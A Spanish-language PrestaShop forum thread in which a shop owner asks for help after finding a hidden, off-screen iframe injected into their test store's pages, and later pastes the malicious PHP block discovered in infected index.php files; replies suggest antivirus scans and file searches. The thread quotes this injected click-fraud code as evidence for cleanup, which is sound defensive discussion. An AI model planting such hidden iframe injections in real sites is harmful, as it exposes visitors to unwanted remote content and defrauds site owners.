Jump to content

Prestashop hackeado


ericzon

Recommended Posts

Hola a tod@s,

 

Tengo un hosting donde hago pruebas, en el que hay instalado un ps 1.5.4, Cada dos días me encuentro que después de donde se cierra el body, hay insertado un iframe que apunta a publicidad externa.

 

Os pongo un ejemplo:


<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="fop" name="fop" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://bali-stone.nl/clicker.php" > </iframe>

Esto hace que la web que algo desconfigurada y al añadir un producto al carrito por ajax, pete de mala manera.

 

He buscado en la base de datos y en los archivos y no parece nada que coincida con los nombres que se utilizan en ese trozo de código.

 

Sabéis como puedo proteger mejor mi Prestashop de este tipo de ataques o como puedo limpiar lo que han conseguido introducir?

 

Un saludo y gracias

Link to comment
Share on other sites

Hola,

 

Debes tener infectado los ficheros index, de forma que cada vez que lo sube te incorpora el iframe problemático.

 

Tendrías que limpiar primero el virus del ordenador, puedes mirar aquí unas instrucciones.

 

http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/trojanclickerhtmliframe

 

¿Tienes activado algún antivirus, algo estilo malware o adware te puede ser útil en este caso?

 

También algo más básico como el AVG gratuito, para el dia a dia.

 

Espero que lo puedas solucionar.

 

Saludos

Link to comment
Share on other sites

Hola a tod@s,

 

Tengo un hosting donde hago pruebas, en el que hay instalado un ps 1.5.4, Cada dos días me encuentro que después de donde se cierra el body, hay insertado un iframe que apunta a publicidad externa.

 

Os pongo un ejemplo:


<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="fop" name="fop" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://bali-stone.nl/clicker.php" > </iframe>
Esto hace que la web que algo desconfigurada y al añadir un producto al carrito por ajax, pete de mala manera.

 

He buscado en la base de datos y en los archivos y no parece nada que coincida con los nombres que se utilizan en ese trozo de código.

 

Sabéis como puedo proteger mejor mi Prestashop de este tipo de ataques o como puedo limpiar lo que han conseguido introducir?

 

Un saludo y gracias

 

Hola,

 

Me llamo Raul Martinez,

 

Tienes programas que te permiten hacer una busqueda en todos los ficheros de tu tienda, sin necesidad de abrir los ficheros uno por uno.

 

¿Puedo ver tu web para ver si me salta el antivirus o algo asi?

Link to comment
Share on other sites

Tengo el pc con antivirus y he escaneado sin encontrar nada grave. Por el momento, he cambiado la contraseña del ftp, he dejado de usar el Filezilla, a cambio del WinSCP, he comprobado que los permisos de las carpetas y archivos estén ok y he podido ver que efectivamente, los archivos index.php de la raíz y del 1er nivel de carpetas que cuelgan de ella, tienen los index infectados por igual.


// contenido habitual del index.php
...
exit();

#44e890#
if(empty($xwdkv)) {
$xwdkv = "<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id=\"zsk\" name=\"zsk\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://www.freedogimport.com/clik.php\" > </iframe>
";
echo $xwdkv;
}
#/44e890#

Lo curioso es que se ejecute estando después del exit. Por el momento lo he machacado con una copia de seguridad que tengo sin infectar, lo malo es que hasta que no tape la vía de entrada, esto volverá a pasar. Alguna posible solución?

 

Muchas gracias a tod@s

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...